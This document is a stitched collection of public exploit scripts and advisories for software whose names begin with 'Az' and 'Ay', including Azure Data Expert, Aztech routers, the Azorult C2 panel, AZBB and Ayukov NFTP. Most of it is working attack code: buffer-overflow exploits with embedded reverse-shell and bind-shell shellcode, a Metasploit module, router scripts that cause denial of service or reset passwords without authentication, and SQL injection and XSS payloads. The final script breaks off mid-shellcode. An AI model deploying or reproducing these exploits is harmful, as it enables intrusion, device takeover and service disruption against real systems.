# Exploit Title: Azure Data Expert Ultimate 2.2.16 – buffer overflow
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.azuredex.com/downloads.html
# Version: 2.2.16
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6506
# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.
import socket
# QtGui4.dll 0x6527635E - CALL ESP
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on SMTP port: '+str(port)
if len(rev_met_1) >= 236:
print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
exit(1)
elif len(rev_met_2) >= 76:
print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
exit(1)
while True:
conn, addr = s.accept()
conn.send('220 '+buffer+'\r\n')
conn.close()
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
Microsoft
Apache Ambari
Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408
import requests
# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
# Define a function to validate the headers
def validate_headers(headers):
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
return False
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
return False
return True
# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
if not validate_headers(headers):
print("Invalid headers")
return
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Call the send_request function with the URL and headers
send_request(url, headers)
/*
source: https://www.securityfocus.com/bid/69809/info
Multiple Aztech routers are prone to a denial-of-service vulnerability.
Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition.
Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable.
*/
#!/usr/bin/perl
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "---------------------------------------------\n";
print "++ Aztech Modem Denial of Service Attack\n";
print "++ Usage: perl $0 TARGET:PORT\n";
print "++ Ex: perl $0 192.168.254.254:80\n\n";
exit;
}
my $TARGET = $ARGV[0];
my ($HOST, $PORT)= split(':',$TARGET);
my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69";
system ('clear');
print "---------------------------------------------\n";
print "++ Resetting WAN modem $TARGET\n";
my $POST = "GET $PATH HTTP/1.1";
my $ACCEPT = "Accept: text/html";
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
print $sock "$POST\n";
print $sock "$ACCEPT\n\n";
print "++ Sent. The modem should be disconnected by now.\n";
$sock->close();
exit;
source: https://www.securityfocus.com/bid/69811/info
Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected device.
#!/usr/bin/perl
# Title: Aztech Modem Broken Session Management Exploit
# Author: Eric Fajardo - fjpfajardo@ph.ibm.com
#
# A successful authentication of a privilege (admin) ID in the
# web portal allows any attacker in the network to hijack and
# reuse the existing session in order to trick and allow the web
# server to execute administrative commands. The command may be
# freely executed from any terminal in the network as long as
# the session of the privilege ID is valid. The below PoC shows
# an un-authenticated request to the web server for an administrator
# and user password reset.
#
# This exploit was tested working with the following modems:
# - DSL5018EN(1T1R) from Globe Telecom
# - DSL705E
# - DSL705EU
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "---------------------------------------------\n";
print "++ Aztech Modem Broken Session Management Exploit\n";
print "++ Usage: perl $0 TARGET:PORT NEWPASSWORD\n";
print "++ Ex: perl $0 192.168.254.254:80 h4rh4rHaR\n\n";
exit;
}
my $TARGET = $ARGV[0];
my $NEWPASS = $ARGV[1];
my ($HOST, $PORT)= split(':',$TARGET);
my $PATH = "/cgi-bin/admAccess.asp";
system ('clear');
print "---------------------------------------------\n";
print "++ Sending POST string to $TARGET ...\n";
my $PAYLOAD = "saveFlag=1&adminFlag=1&SaveBtn=SAVE&uiViewTools_Password=$NEWPASS&uiViewTools_PasswordConfirm=$NEWPASS&uiViewTools_Password1=$NEWPASS&uiViewTools_PasswordConfirm1=$NEWPASS";
my $POST = "POST $PATH HTTP/1.1";
my $ACCEPT = "Accept: text/html, application/xhtml+xml, */*";
my $REFERER = "Referer: http://$HOST/cgi-bin/admAccess.asp";
my $LANG = "Accept-Language: en-US";
my $AGENT = "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25";
my $CONTYPE = "Content-Type: application/x-www-form-urlencoded";
my $ACENCODING = "Accept-Encoding: gzip, deflate";
my $PROXYCONN = "Proxy-Connection: Keep-Alive";
my $CONNLENGTH = "Content-Length: 179";
my $DNT = "DNT: 1";
my $TARGETHOST = "Host: $HOST";
my $PRAGMA = "Pragma: no-cache";
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
print $sock "$POST\n";
print $sock "$ACCEPT\n";
print $sock "$REFERER\n";
print $sock "$LANG\n";
print $sock "$AGENT\n";
print $sock "$CONTYPE\n";
print $sock "$ACENCODING\n";
print $sock "$PROXYCONN\n";
print $sock "$CONNLENGTH\n";
print $sock "$DNT\n";
print $sock "$TARGETHOST\n";
print $sock "$PRAGMA\n\n";
print $sock "$PAYLOAD\n";
print "++ Sent. Connect to the web URL http://$HOST with user:admin password:$NEWPASS\n";
$sock->close();
exit;
/*
source: https://www.securityfocus.com/bid/69808/info
Aztech Modem Routers are prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
*/
HOST=$1
PORT=$2
PARM1="\x48\x6f\x73\x74\x3a\x20"
PARM2="\x50\x72\x6f\x78\x79\x2d\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65"
PARM3="\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38"
PARM4="\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x33\x37\x2e\x30\x2e\x32\x30\x36\x32\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36"
PARM5="\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x61\x64\x6d\x53\x65\x74\x74\x69\x6e\x67\x73\x2e\x61\x73\x70"
PARM6="\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61\x74\x65\x2c\x73\x64\x63\x68"
PARM7="\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38"
NARGS=1
BARGS=65
main() {
printf "\---------------------------------------------\n";
printf "++ Aztech Modem Get Configuration File Exploit\n";
printf "++ Usage: $0 TARGET PORT\n";
printf "++ Ex: $0 192.168.254.254 80\n\n";
}
[[ $# -le $NARGS ]] && main && exit $BARGS
curl -i -H "$PARM1" \
-H "$PARM2" \
-H "$PARM3" \
-H "$PARM4" \
-H "$PARM5" \
-H "$PARM6" \
-H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg
# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
# Date: 2025-02-26
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.aztech.com
# Version: DSL5005EN
# Tested on: Linux
# CVE: N/A
import requests
import argparse
print('''
#################################################################################
# aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
# BY: Amir Hossein Jamshidi #
# Mail: amirhosseinjamshidi64@gmail.com #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD #
#################################################################################
''')
def change_password(ip_address, password):
"""
Changes the password of a device at the given IP address.
Args:
ip_address: The IP address of the device (e.g., "192.168.1.1").
password: The new password to set.
"""
url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
origin = f"http://{ip_address}"
referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
payload = {
"saveFlag": "1",
"adminFlag": "1",
"SaveBtn": "SAVE",
"uiViewTools_Password": password,
"uiViewTools_PasswordConfirm": password
}
headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": origin,
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": referer,
"Connection": "keep-alive"
}
try:
response = requests.post(url, data=payload, headers=headers, timeout=10)
if response.status_code == 200:
print(f"Password change request to {ip_address} successful!")
print(f"Username: admin")
print(f"Password: {password}")
else:
print(f"Request to {ip_address} failed with status code: {response.status_code}")
print(f"Response content:\n{response.text}") # Print response for debugging
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Change password of a device.")
parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
args = parser.parse_args()
change_password(args.ip_address, args.password)
import requests
import argparse
import base64
# Azorult 3.3.1 C2 SQLi by prsecurity
# For research purposes only. Don't pwn what you don't own.
# change GUID and XOR key to specific beacon, can be extracted from a sample
guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
key = "\x03\x55\xae"
def get_args():
parser = argparse.ArgumentParser(
prog="azorult_sploit.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
epilog= '''
This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
''')
parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
args = parser.parse_args()
return args
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data[i])^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
def pwn_target(target, num_records, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
print("[*] Your IP: {}".format(r.text))
headers = {
"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
}
print('[+] Getting URL, LOGIN AND PASS')
data = [
"|".join([
"1","2","3","4","5","6","7","8","9","10","11","12"
]),
"\r\n".join([
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
]),
"c",
"d",
":".join(["'11","22"])
]
payload = CB_XORm(guid.join(data), key)
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
if r.text != "OK":
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
raise
print('[+] Getting LOGIN/PASS')
data = [
"|".join([
"1","2","3","4","5","6","7","8","9","10","11","12"
]),
"\r\n".join([
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
]),
"c",
"d",
":".join(["'11","22"])
]
payload = CB_XORm(guid.join(data), key)
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
if r.text != "OK":
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
raise
print('[+] If this worked, you will see two new records in password table at guest.php')
except:
print("[-] ERROR: Something went wrong.")
print(r.text)
raise
def main():
print ()
print ('Azorult 3.3.1 SQLi by prsecurity')
args = get_args()
pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
if __name__ == '__main__':
main()
# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
# Date: 2024-06-03
# Exploit Author: Buğra Enis Dönmez
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
# Demo Site: https://azon-dominator.webister.net/
# Tested on: Arch Linux
# CVE: N/A
### Request ###
POST /fetch_products.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/
Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
Content-Length: 79
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
###
### Parameter & Payloads ###
Parameter: cid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1) AND 7735=7735 AND (5267=5267
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
###
source: https://www.securityfocus.com/bid/48955/info
AzeoTech DAQFactory is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
Versions prior to DAQFactory 5.85 are vulnerable.
The following exploit requests are available:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
source: https://www.securityfocus.com/bid/53692/info
AzDGDatingMedium is prone to multiple remote vulnerabilities that includes a SQL-injection vulnerability, an information-disclosure vulnerability, a directory-traversal vulnerability and multiple cross-site scripting vulnerabilities,
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information.
AzDGDatingMedium 1.9.3 is vulnerable; other versions may also be affected.
http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php%00<script>alert(1);</script>
http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default%00<script>alert("AkaStep");</script>&dir=../include/&f=config.inc.php
http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php
AZBB Multiple Vulnerabilities
Vendor: AZBB
Product: AZBB
Version: <= 1.0.07d
Website: http://azbb.cyaccess.com/
BID: 13272 13278
CVE: CVE-2005-1200 CVE-2005-1201
OSVDB: 15700 15701 15702 15703
SECUNIA: 15013
PACKETSTORM: 37792
Description:
azbb is a forum that was written with a primary focus on security. azbb does not require a database such as MySQL, PostGres or MSSQL and can even be used as a blog, or portal of sorts. Unfortunately there are a number of security issues in AZBB versions prior to 1.0.08, but none of these issues are considered "high risk". However, the developer has addressed these issues and all users should upgrade to the current 1.0.08 version. These vulnerabilities include file enumeration, arbitrary file deletion, and file inclusion issues.
Arbitrary File Deletion:
There is an issue in AZBB that could allow for an attacker logged in as an admin, or a malicious admin to delete arbitrary files outside the scope of the application. The vulnerable code is in admin_avatar.php and admin_attachment.php Lets have a look at the code in admin_avatar.php
## trim all and delete
foreach ($_POST['avat_select'] as $ent)
{
if (file_exists($dir_avatar.'/'.$ent))
{ unlink($dir_avatar.'/'.$ent); }
}
As we can see there are no checks made for traversal sequences, and a user with admin privileges could easily delete arbitrary files on the server. The vulnerability in admin_attachment.php is nearly identical.
File Include Vulnerability:
There is a file inclusion vulnerability in AZBB 1.0.07a - 1.0.07c that is the result of missing code that is present in all of the other AZBB versions. This file inclusion issue poses a different risk level depending on your server configuration. Lets have a look at the code in question. @ /azbb_center/source/main_index.php
########## Get the Abstraction Layer
$inc = $dir_src.'/'.$abs_layer.'_db_ops.php';
file_exists($inc) ? include($inc) : exit('Unable to open '.$inc);
Since the "AZBB KEY CHECK" that exists in other pages is missing from this page we can influence both the $dir_src and $abs_layer variables if register globals is on. However, what we can do with this greatly depends on the server configuration, and this is a result of the file_exists() function being used. You can read more about this in the official php manual located here http://us2.php.net/file_exists
Arbitrary File Enumeration:
There is an issue in AZBB that can be exploited by both users and guests alike to tell whether or not files on the target server exists. This is due to a file check coming before the input is cleaned in attachment.php
elseif (!file_exists($dir_att.'/'.$_POST['attachment'])) {$error = $txt_err[13];}
This issue can not be used to download arbitrary files, because the input is cleaned before the file is included, but we can enumerate files. To check if a file exists on the target web server all an attacker has to do is modify the "attachment" parameter to include traversal sequences. If the file exists we will be prompted with a download, and if it doesn't exists we will see an error message.
Solution:
The developer of AZBB was very quick to respond and has addressed these issues. A complete change log can be seen by following the url posted below. Also, you will find the link to the updated AZBB 1.0.08 downloads below
http://azbb.cyaccess.com/azbb.php?1091778548
http://azbb.cyaccess.com/azbb.php?1091872271
All users are advised to upgrade their azbb installations as soon as possible. A special thanks to AZ for remedying these issues so quickly. If everyone responded in this timely of a manner it would make what we do a lot easier :)
Credits:
James Bercegay of the GulfTech Security Research Team
[+] Sql Injection on AZADMIN CMS of HIDEA v1.0
[+] Date: 24/06/2019
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://www.hidea.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable Files: news_det.php
[+] Dork : inurl:"news_det.php?cod=" HIDEA
[+] Exploit : https://www.site.com/news_det.php?cod=[SQL Injection]
[+] Payload : /*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] PoC:
http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
https://site.com/news_det.php?cod=77/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] Example:
curl 'http://site.com/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-' -H 'Host: www.centroconcept.com.br' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3' --compressed -H 'Cookie: PHPSESSID=dv0rd3b6rbghah80getonfp601' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1'
XPATH syntax error: '
s3x0u:centroco_ger:s3x0u'
source: https://www.securityfocus.com/bid/53641/info
The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20
http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Ayukov NFTP FTP Client Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
code exeuction under the context of the user if successfully exploited.
},
'Author' =>
[
'Berk Cem Goksel', # Original exploit author
'Daniel Teixeira', # MSF module author
'sinn3r' # RCA, improved module reliability and user exp
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-15222'],
[ 'EDB', '43025' ],
],
'Payload' =>
{
'BadChars' => "\x00\x01\x0a\x10\x0d",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'Oct 21 2017',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
])
end
def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end
srv_port = datastore['SRVPORT']
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
print_status("#{client.peerhost} - connected")
# Let the client log in
client.get_once
print_status("#{client.peerhost} - sending 331 OK")
user = "331 OK.\r\n"
client.put(user)
client.get_once
print_status("#{client.peerhost} - sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
# It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
# is visible from the user's command prompt, which would make the buffer overflow attack too
# obvious.
sploit = "\x20"*4116
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
sploit << "\r\n"
print_status("#{client.peerhost} - sending the malicious response")
client.put(sploit)
client.get_once
pwd = "257\r\n"
client.put(pwd)
client.get_once
end
end
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222
# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
import socket
IP = '192.168.43.28'
port = 21
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
